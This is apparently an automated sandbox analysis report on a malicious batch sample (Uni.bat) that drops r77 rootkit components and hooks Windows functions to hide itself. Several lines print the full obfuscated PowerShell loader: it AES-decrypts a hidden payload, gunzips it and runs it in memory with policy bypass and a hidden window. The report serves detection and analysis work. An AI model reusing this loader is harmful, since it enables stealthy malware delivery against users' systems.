$DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] (''))) Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d6e02c51-9612-4091-b0a3-037f24ee9b79} Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C cd C:\Windows\ & $sxr-seroxen.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] (''))) Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{13e478b5-f900-4cff-9b71-2eeec68eb126} Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{990e3f84-620e-4699-897b-705569b7aedb} Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\Uni.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000000014006F8B0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification, 5_2_000000014006F8B0
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_000000014006F8B0 GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification, 11_2_000000014006F8B0
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Uni.bat.exe Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz1mwdtf.qmy.ps1 Jump to behavior
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: 4\Device\HarddiskVolume4\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.22.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-SMBServer%4Operational.evtx.22.dr Binary string: computer WORKGROUP:\Device\NetBT_Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: {\Device\HarddiskVolume4\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\93.269.200\software_reporter_tool.exe=
Source: System.evtx.22.dr Binary string: \Device\HarddiskVolume4\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: {\Device\HarddiskVolume4\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe=
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.22.dr Binary string: J\Device\HarddiskVolume4\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.22.dr Binary string: DESKTOP-RI7A1LE WORKGROUP:\Device\NetBT_Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: {\Device\HarddiskVolume4\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe3
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: 4\Device\HarddiskVolume4\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.22.dr Binary string: :\Device\NetBT_Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}X
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.22.dr Binary string: >\Device\HarddiskVolume4\Windows\System32\drivers\filetrace.sys
Source: Application.evtx.22.dr Binary string: Checking file system on \Device\HarddiskVolume4
Source: Microsoft-Windows-SMBServer%4Operational.evtx.22.dr Binary string: :\Device\NetBT_Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: {\Device\HarddiskVolume4\Users\user\AppData\Local\Google\Chrome\User Data\SwReporter\93.269.200\software_reporter_tool.exe3
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.22.dr Binary string: _\Device\HarddiskVolume4\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@16/78@0/1
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000000014006F190 CoInitialize,CoCreateInstance,CoUninitialize, 5_2_000000014006F190
Source: C:\Users\user\Desktop\Uni.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9156:304:WilStaging_02
Source: C:\Windows\$sxr-seroxen.bat.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\54a46632-60d6-4106-9a74-66bee329a2de
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400678E3 FindResourceA,SizeofResource,LoadResource,LockResource, 5_2_00000001400678E3
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Uni.bat" "
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Uni.bat.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Uni.bat Static file information: File size 8088150 > 1048576
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140d.amd64.pdb source: vcruntime140d.dll.10.dr
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\Uninstall64.pdb source: Uni.bat.exe, 00000003.00000002.2634186452.0000019D129EF000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000002.2496136808.0000019D10506000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000005.00000000.2365436341.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000005.00000000.2369515088.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 00000005.00000002.2391214363.000000014013F000.00000040.00000001.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3073672639.000001B3B2094000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3080757815.000001B3B21B2000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2809577055.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000000.2792652478.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000000.2777688385.000000014013F000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\C5\Documents\InstallStager\obj\Debug\InstallStager.pdb source: Uni.bat.exe, 00000003.00000002.2497057533.0000019D10546000.00000004.00000800.00020000.00000000.sdmp, $sxr-seroxen.bat.exe, 0000000A.00000003.3075008245.000001B3B20CA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\InstallService64.pdb source: dllhost.exe, 0000000C.00000000.3122152599.000000014013F000.00000040.00000001.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000000.3118963870.000000014013F000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\TCDE700.tmp.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb source: vcruntime140_1d.dll.10.dr
Source: Binary string: costura.costura.pdb.compressed source: Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb""" source: vcruntime140_1d.dll.10.dr
Source: Binary string: powershell.pdbUGP source: Uni.bat.exe, 00000003.00000000.2252313642.00007FF640F2A000.00000002.00000001.01000000.00000003.sdmp, $sxr-seroxen.bat.exe.6.dr, Uni.bat.exe.0.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991 source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ucrtbased.pdbGCTL source: ucrtbased.dll.10.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: $sxr-seroxen.bat.exe, 0000000A.00000003.3082027574.000001B3B21E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991K source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.10.dr
Source: Binary string: powershell.pdb source: Uni.bat.exe, 00000003.00000000.2252313642.00007FF640F2A000.00000002.00000001.01000000.00000003.sdmp, $sxr-seroxen.bat.exe.6.dr, Uni.bat.exe.0.dr
Source: Binary string: C:\Users\C5\Documents\r77-rootkit-master\r77-rootkit-master\vs\x64\Debug\r77-x64.pdb source: dllhost.exe, 0000000C.00000000.3159101923.000000014026D000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3217285324.0000023567800000.00000040.00000001.00020000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3206981447.0000023565BD5000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3281916564.000002AFF5EE5000.00000040.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3283701199.000002AFF6080000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3310345436.0000020F6F7C5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3312143440.0000020F6F960000.00000040.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3495401012.00000252B9115000.00000040.00000001.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.3590794816.00000252B92B0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.3612310946.000001E5453B5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.3624806486.000001E545A90000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3661604975.000001488E185000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3692429646.000001488E550000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.3721530561.0000021FDABC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.3719665518.0000021FDAA25000.00000040.00000001.00020000.00000000.sdmp, IntelCpHDCPSvc.exe, 00000014.00000000.3734350879.00000225E8CF5000.00000040.00000001.00020000.00000000.sdmp, IntelCpHDCPSvc.exe, 00000014.00000000.3744646048.00000225E8E90000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.3760323961.0000012E243A5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000000.3771979511.0000012E24540000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3919313900.0000027F00B50000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3780236062.0000027F00105000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3958785710.0000014BEA3B5000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3975353339.0000014BEA550000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.3993158287.0000023FA6725000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.4006052296.0000023FA68C0000.00000040.00000001.00020000.00000000.sdmp, IntelCpHeciSvc.exe, 00000019.00000000.4030458116.00000148255B0000.00000040.00000001.00020000.00000000.sdmp, IntelCpHeciSvc.exe, 00000019.00000000.4028103118.0000014825415000.00000040.00000001.00020000.00000000.sdmp, igfxCUIService.exe, 0000001A.00000000.4052985855.00000252DE3D5000.00000040.00000001.00020000.00000000.sdmp, igfxCUIService.exe, 0000001A.00000000.4054962319.00000
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: svchost.exe, 00000017.00000000.3951094596.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3967824624.0000014BE9446000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: $sxr-seroxen.bat.exe, 0000000A.00000003.3082027574.000001B3B21E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140d.amd64.pdb/// source: vcruntime140d.dll.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000017.00000000.3951826467.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.3968526894.0000014BE946B000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected Costura Assembly Loader
Source: Yara match File source: 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Uni.bat.exe PID: 5268, type: MEMORYSTR
Obfuscated command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] ('')))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\$sxr-seroxen.bat.exe "$sxr-seroxen.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $dTvqc = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Windows\$sxr-seroxen.bat').Split([Environment]::NewLine);foreach ($xWedX in $dTvqc) { if ($xWedX.StartsWith(':: ')) { $IIMux = $xWedX.Substring(3); break; }; };$sruNp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($IIMux);$lrCpk = New-Object System.Security.Cryptography.AesManaged;$lrCpk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$lrCpk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$lrCpk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WjKBU6kw+D26wh+8C8AVNw88e4KNe0j8V15CylIW9B8=');$lrCpk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ncm0BfWz0RHt+QRojgON8Q==');$SCKKz = $lrCpk.CreateDecryptor();$sruNp = $SCKKz.TransformFinalBlock($sruNp, 0, $sruNp.Length);$SCKKz.Dispose();$lrCpk.Dispose();$fPStr = New-Object System.IO.MemoryStream(, $sruNp);$DsNJO = New-Object System.IO.MemoryStream;$vIclt = New-Object System.IO.Compression.GZipStream($fPStr, [IO.Compression.CompressionMode]::Decompress);$vIclt.CopyTo($DsNJO);$vIclt.Dispose();$fPStr.Dispose();$DsNJO.Dispose();$sruNp = $DsNJO.ToArray();$DjUff = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($sruNp);$DFfIo = $DjUff.EntryPoint;$DFfIo.Invoke($null, (, [string[]] (''))) Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140069430 push rbx; retf 5_2_0000000140069433
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_0000000140069430 push rbx; retf 11_2_0000000140069433
PE file contains sections with non-standard names
Source: vcruntime140d.dll.10.dr Static PE information: section name: _RDATA
Binary contains a suspicious time stamp
Source: Uni.bat.exe.0.dr Static PE information: 0x7EDA4115 [Wed Jun 10 07:45:25 2037 UTC]
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\$sxr-seroxen.bat.exe Jump to behavior
Drops PE files
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\$sxr-seroxen\$sxr-nircmd.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\Desktop\Uni.bat.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\vcruntime140_1d.dll Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Windows\$sxr-seroxen.bat.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\$sxr-seroxen\$sxr-nircmd.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\vcruntime140_1d.dll Jump to dropped file
Source: C:\Windows\System32\cmd.exe File created: C:\Windows\$sxr-seroxen.bat.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe File created: C:\Windows\System32\ucrtbased.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hooks registry keys query functions (used to hide registry keys)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Hooks processes query functions (used to hide processes)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Modifies the prolog of user mode functions (user mode inline hooks)
Source: winlogon.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
Deletes itself after installation
Source: C:\Users\user\Desktop\Uni.bat.exe File deleted: c:\users\user\desktop\uni.bat Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\$sxr-seroxen.bat.exe File opened: C:\Windows\$sxr-seroxen.bat.exe:Zone.Identifier read attributes | delete Jump to behavior
Hooks files or directories query functions (used to hide files and directories)
Source: winlogon.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
